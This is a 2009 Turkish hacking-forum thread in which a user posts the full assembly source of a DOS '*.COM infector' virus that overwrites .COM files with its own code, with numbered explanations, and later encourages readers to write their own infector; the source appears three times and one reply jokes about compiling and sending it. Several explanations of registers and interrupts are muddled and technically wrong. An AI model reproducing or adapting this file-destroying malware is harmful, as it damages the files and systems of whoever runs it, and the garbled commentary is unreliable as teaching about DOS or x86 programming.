25 satır kodla virüs || by Syntax-Life

Volatile. · 21-07-2009, 23:51

Merhabalar,

Assembly ile biliyosunuz ki en iyi virüsler yapılabiliyor bugün size kendi örneklerimden 25 satırlık bir kod vereceğim ve DOS/16-bit için uygundur. *.COM dosyalarını siler derleyip kendinizde açmayın, derslerime eğitim ve ilgi çekiçi olması için ekledim eğitim amaçlı yazdım!!

Kod bana aittir!
Kod

Kod:

code segment

assume cs:code ds:code

         org    100h

start proc near

         mov    ah, 4eh
         mov    cx, 100h
         mov    dx, offset infect
         int    21h

         mov    ah, 3dh
         mov    al, 2ah
         mov    dx, 9eh
         int    21h

         xchg   bx, ax

         mov    ah, 40h
         mov    cx, offset infect - offset start
         mov    dx, offset start
         int    21h

         mov    ah, 3eh
         int    21h

         int    20h

start endp

infect   db "*.COM", 0
endit    label near
scene    "*.COM infector | wardom.org |  Assembly  // Syntax-Life"
code     ends

1 - code segment'i kodu işaret ediyor ve veriler ds'de saklanıyor
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=295133
2 - *.com dizini 0x0100'den başladığı için org 100h
3 - üçüncü işlemde ise AH(8 bitlik acc'ye) 4eh ile arama fonksiyonu konuluyor.
4 -Sayaca 100 fonksiyonu verilerek dizine iniliyor burdaki veri offsetleri virus bulaşılmış offset adresleri olarak gözüküyor
5 -Ardından direk 21h donanım kesmesi ile DOS'a dönülüyor

6- ah'ye dosyayı açıp içine yazması gereken fonksiyon 3dh veriliyor.
7 - al'ye(bkz. google x86 işlemci mimarisi komutlar ve dallanmalar) ise dallanması için fonksiyon veriliyor
8 - dx ise veriyi üzerine yazmayı sağlayacak yani (80 + 1Eh = 9Eh) işlemi yapıyor
9 - bölge ile akümülatörün yeri değişiyor (nedeni tüm akümülatörler (8bitlik fonksiyon taşıyanlar) devreye girsin ve offsetler üzerinde işlem yapsın diye)
10 - fonksiyon al'ye atandı
11 - cx'de bölgenin offset adresi vardı tüm işlemler yapıldıktan sonra başa daşa dönmek için 100 - offset-start
12 - dx'de zaten başlangıç adresini tutuyordu =)
13 - kesme çağırılıyor
14 - işlem bitince dosyayı kapatıyor
15 - kesme çağırılıyor
16 - uygulamayı'da yoketmesini istiyor
17 - işlem bitiriliyor
18 - bulaşılacak dosyanın napılacağı bilgisi 0'lanıyor yani siliniyor
19 - sonra ekrana mesaj yazıyor

Edit: tam anlamıyla düzgün bir açıklama yaptım

RebelFa1con · 21-07-2009, 23:56

assembly öğrenmeye çalışacağım bakalım neler olacak

TheVikinGs · 22-07-2009, 00:02

Alıntı:

Orjinal Mesaj Sahibi -RebelFa1con

assembly öğrenmeye çalışacağım bakalım neler olacak

Bende yarımım henüz, tamamlayamadık

Teşekkürler syntax,

djmavi · 22-07-2009, 08:54

Alıntı:

Orjinal Mesaj Sahibi -RebelFa1con

assembly öğrenmeye çalışacağım bakalım neler olacak

İyi kafa yapar ona göre Ehehe... Okulda başlangıç olarak göstermişlerdi. " Başlat => Çalıştır => debug " Bayraklar kesmeler....vs.vs.

dark_scientist · 22-08-2009, 18:16

walla ben de bi giriyim dedim....giriş o giriş....girdiğim gibi kaldım

Volatile. · 01-09-2009, 18:37

Açıklamalar düzenlendi açıklamalara bakarak kendinize göre yeni bir infector virüs yapabilirsiniz fonksiyonların açıklamaları yazmakta

racasami · 06-09-2009, 02:48

saolasın dostum

karahan09 · 07-09-2009, 19:33

tskler ılgıncmıs not defterıne kopyalamayı goze alamadım

Root@localhost · 12-09-2009, 05:21

sağol denetelim

:d derliyip yolluyalım

dsprado77 · 06-12-2009, 01:11

Bende öğrenmeliyim

okulda ödevler falan birde uzun süredir ilgimi çekiyor ama bir türlü başlayamadım bana tavsiye edebiliceğin bir döküman varmı yada ne yapmalıyım ...

dsprado77 · 06-12-2009, 01:13

Alıntı:

Orjinal Mesaj Sahibi Volatile.

Merhabalar,

Assembly ile biliyosunuz ki en iyi virüsler yapılabiliyor bugün size kendi örneklerimden 25 satırlık bir kod vereceğim ve DOS/16-bit için uygundur. *.COM dosyalarını siler derleyip kendinizde açmayın, derslerime eğitim ve ilgi çekiçi olması için ekledim eğitim amaçlı yazdım!!

Kod bana aittir!
Kod

Kod:

code segment

assume cs:code ds:code

         org    100h

start proc near

         mov    ah, 4eh
         mov    cx, 100h
         mov    dx, offset infect
         int    21h

         mov    ah, 3dh
         mov    al, 2ah
         mov    dx, 9eh
         int    21h

         xchg   bx, ax

         mov    ah, 40h
         mov    cx, offset infect - offset start
         mov    dx, offset start
         int    21h

         mov    ah, 3eh
         int    21h

         int    20h

start endp

infect   db "*.COM", 0
endit    label near
scene    "*.COM infector | wardom.org |  Assembly  // Syntax-Life"
code     ends

1 - code segment'i kodu işaret ediyor ve veriler ds'de saklanıyor
2 - *.com dizini 0x0100'den başladığı için org 100h
3 - üçüncü işlemde ise AH(8 bitlik acc'ye) 4eh ile arama fonksiyonu konuluyor.
4 -Sayaca 100 fonksiyonu verilerek dizine iniliyor burdaki veri offsetleri virus bulaşılmış offset adresleri olarak gözüküyor
5 -Ardından direk 21h donanım kesmesi ile DOS'a dönülüyor

6- ah'ye dosyayı açıp içine yazması gereken fonksiyon 3dh veriliyor.
7 - al'ye(bkz. google x86 işlemci mimarisi komutlar ve dallanmalar) ise dallanması için fonksiyon veriliyor
8 - dx ise veriyi üzerine yazmayı sağlayacak yani (80 + 1Eh = 9Eh) işlemi yapıyor
9 - bölge ile akümülatörün yeri değişiyor (nedeni tüm akümülatörler (8bitlik fonksiyon taşıyanlar) devreye girsin ve offsetler üzerinde işlem yapsın diye)
10 - fonksiyon al'ye atandı
11 - cx'de bölgenin offset adresi vardı tüm işlemler yapıldıktan sonra başa daşa dönmek için 100 - offset-start
12 - dx'de zaten başlangıç adresini tutuyordu =)
13 - kesme çağırılıyor
14 - işlem bitince dosyayı kapatıyor
15 - kesme çağırılıyor
16 - uygulamayı'da yoketmesini istiyor
17 - işlem bitiriliyor
18 - bulaşılacak dosyanın napılacağı bilgisi 0'lanıyor yani siliniyor
19 - sonra ekrana mesaj yazıyor

Edit: tam anlamıyla düzgün bir açıklama yaptım

ya satır satır kod işletilirken her satırın ne yaptıgını comment geçseymişin çok süper olcakmış.Comment yazmanı tavsiye ederim çok anlamayanlar için açıklayıcı olacaktır...

Dangerious · 06-12-2009, 01:14

kafa patlatmak isteyen asm kassın

dark_scientist · 13-01-2010, 20:39

peki bu COM dosyaları silinince ne oluyor...??bilgisayar açılmıyor mu yoksa başka bişi mi....bi de yarattığı sorunu çözmenin tek yolu format mı???.....Ha bi de unutmadan zeki müren de bizi görecek mi?....

MrQua · 13-01-2010, 21:31

ii bizde assembly 'e baslayacaz işin icinden de cıkarız

BİZ WARDOM LUYUZ

vampirodelasangr3 · 17-01-2010, 02:06

bu programlar kafa yoruyor ciddende

21-07-2009, 23:51	#1
Volatile. Daimi Üye Kayıt Tarihi: Nov 2008 Üye numarası: #277831 Yer: Ankara Mesaj sayısı: 660 Karma etkisi: 2416 Karma: 241202	25 satır kodla virüs \|\| by Syntax-Life Merhabalar, Assembly ile biliyosunuz ki en iyi virüsler yapılabiliyor bugün size kendi örneklerimden 25 satırlık bir kod vereceğim ve DOS/16-bit için uygundur. .COM dosyalarını siler derleyip kendinizde açmayın, derslerime eğitim ve ilgi çekiçi olması için ekledim eğitim amaçlı yazdım!! Kod bana aittir! Kod Kod: code segment assume cs:code ds:code org 100h start proc near mov ah, 4eh mov cx, 100h mov dx, offset infect int 21h mov ah, 3dh mov al, 2ah mov dx, 9eh int 21h xchg bx, ax mov ah, 40h mov cx, offset infect - offset start mov dx, offset start int 21h mov ah, 3eh int 21h int 20h start endp infect db ".COM", 0 endit label near scene ".COM infector \| wardom.org \| Assembly // Syntax-Life" code ends 1 - code segment'i kodu işaret ediyor ve veriler ds'de saklanıyor Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=295133 2 - .com dizini 0x0100'den başladığı için org 100h 3 - üçüncü işlemde ise AH(8 bitlik acc'ye) 4eh ile arama fonksiyonu konuluyor. 4 -Sayaca 100 fonksiyonu verilerek dizine iniliyor burdaki veri offsetleri virus bulaşılmış offset adresleri olarak gözüküyor 5 -Ardından direk 21h donanım kesmesi ile DOS'a dönülüyor 6- ah'ye dosyayı açıp içine yazması gereken fonksiyon 3dh veriliyor. 7 - al'ye(bkz. google x86 işlemci mimarisi komutlar ve dallanmalar) ise dallanması için fonksiyon veriliyor 8 - dx ise veriyi üzerine yazmayı sağlayacak yani (80 + 1Eh = 9Eh) işlemi yapıyor 9 - bölge ile akümülatörün yeri değişiyor (nedeni tüm akümülatörler (8bitlik fonksiyon taşıyanlar) devreye girsin ve offsetler üzerinde işlem yapsın diye) 10 - fonksiyon al'ye atandı 11 - cx'de bölgenin offset adresi vardı tüm işlemler yapıldıktan sonra başa daşa dönmek için 100 - offset-start 12 - dx'de zaten başlangıç adresini tutuyordu =) 13 - kesme çağırılıyor 14 - işlem bitince dosyayı kapatıyor 15 - kesme çağırılıyor 16 - uygulamayı'da yoketmesini istiyor 17 - işlem bitiriliyor 18 - bulaşılacak dosyanın napılacağı bilgisi 0'lanıyor yani siliniyor 19 - sonra ekrana mesaj yazıyor Edit: tam anlamıyla düzgün bir açıklama yaptım Düzenleyen Volatile. : 01-09-2009 at 15:53. Sebep: açıklamalar düzenlendi

Konu Araçları	Bu Konuda Ara
Printer Çıktısını Göster Sayfayı Emaille Yolla	Bu Konuda Ara: Gelişmiş Arama

21-07-2009, 23:56	#2
RebelFa1con 1st Class WarrioR Kayıt Tarihi: Feb 2009 Üye numarası: #312953 Yer: GMG Garage Mesaj sayısı: 5,775 Karma etkisi: 40506 Karma: 4049798	assembly öğrenmeye çalışacağım bakalım neler olacak

22-08-2009, 18:16	#5
dark_scientist Forum Kalfası Kayıt Tarihi: Nov 2005 Üye numarası: #38182 Yer: le gök arasında bir yerlerde... Mesaj sayısı: 2,175 Karma etkisi: 9309 Karma: 930034	walla ben de bi giriyim dedim....giriş o giriş....girdiğim gibi kaldım

01-09-2009, 18:37	#6
Volatile. Daimi Üye Kayıt Tarihi: Nov 2008 Üye numarası: #277831 Yer: Ankara Mesaj sayısı: 660 Karma etkisi: 2416 Karma: 241202	Açıklamalar düzenlendi açıklamalara bakarak kendinize göre yeni bir infector virüs yapabilirsiniz fonksiyonların açıklamaları yazmakta

06-09-2009, 02:48	#7
racasami 1st Class WarrioR Kayıt Tarihi: Nov 2008 Üye numarası: #287014 Yer: Türkiye Mesaj sayısı: 45 Karma etkisi: 0 Karma: 2694	saolasın dostum

07-09-2009, 19:33	#8
karahan09 Forum Ustası Kayıt Tarihi: Jun 2008 Üye numarası: #229520 Mesaj sayısı: 7,300 Karma etkisi: 48583 Karma: 4857264	tskler ılgıncmıs not defterıne kopyalamayı goze alamadım

12-09-2009, 05:21	#9
Root@localhost Forum Kalfası Kayıt Tarihi: Sep 2009 Üye numarası: #362351 Yer: İzmir Mesaj sayısı: 1,138 Karma etkisi: 11759 Karma: 1175533	sağol denetelim :d derliyip yolluyalım

06-12-2009, 01:11	#10
dsprado77 Hızlı Çırak Kayıt Tarihi: Dec 2005 Üye numarası: #45241 Mesaj sayısı: 80 Karma etkisi: 15 Karma: 801	Bende öğrenmeliyim okulda ödevler falan birde uzun süredir ilgimi çekiyor ama bir türlü başlayamadım bana tavsiye edebiliceğin bir döküman varmı yada ne yapmalıyım ...

06-12-2009, 01:14	#12
Dangerious Forum Ustası Kayıt Tarihi: Jul 2007 Üye numarası: #133070 Yer: Kreuzberg Mesaj sayısı: 8,413 Karma etkisi: 54860 Karma: 5484797	kafa patlatmak isteyen asm kassın

13-01-2010, 20:39	#13
dark_scientist Forum Kalfası Kayıt Tarihi: Nov 2005 Üye numarası: #38182 Yer: le gök arasında bir yerlerde... Mesaj sayısı: 2,175 Karma etkisi: 9309 Karma: 930034	peki bu COM dosyaları silinince ne oluyor...??bilgisayar açılmıyor mu yoksa başka bişi mi....bi de yarattığı sorunu çözmenin tek yolu format mı???.....Ha bi de unutmadan zeki müren de bizi görecek mi?....

13-01-2010, 21:31	#14
MrQua Çırak Kayıt Tarihi: Jan 2010 Üye numarası: #410591 Mesaj sayısı: 13 Karma etkisi: 0 Karma: 10	ii bizde assembly 'e baslayacaz işin icinden de cıkarız BİZ WARDOM LUYUZ

17-01-2010, 02:06	#15
vampirodelasangr3 1st Class WarrioR Kayıt Tarihi: Dec 2009 Üye numarası: #396376 Mesaj sayısı: 247 Karma etkisi: 52 Karma: 4962	bu programlar kafa yoruyor ciddende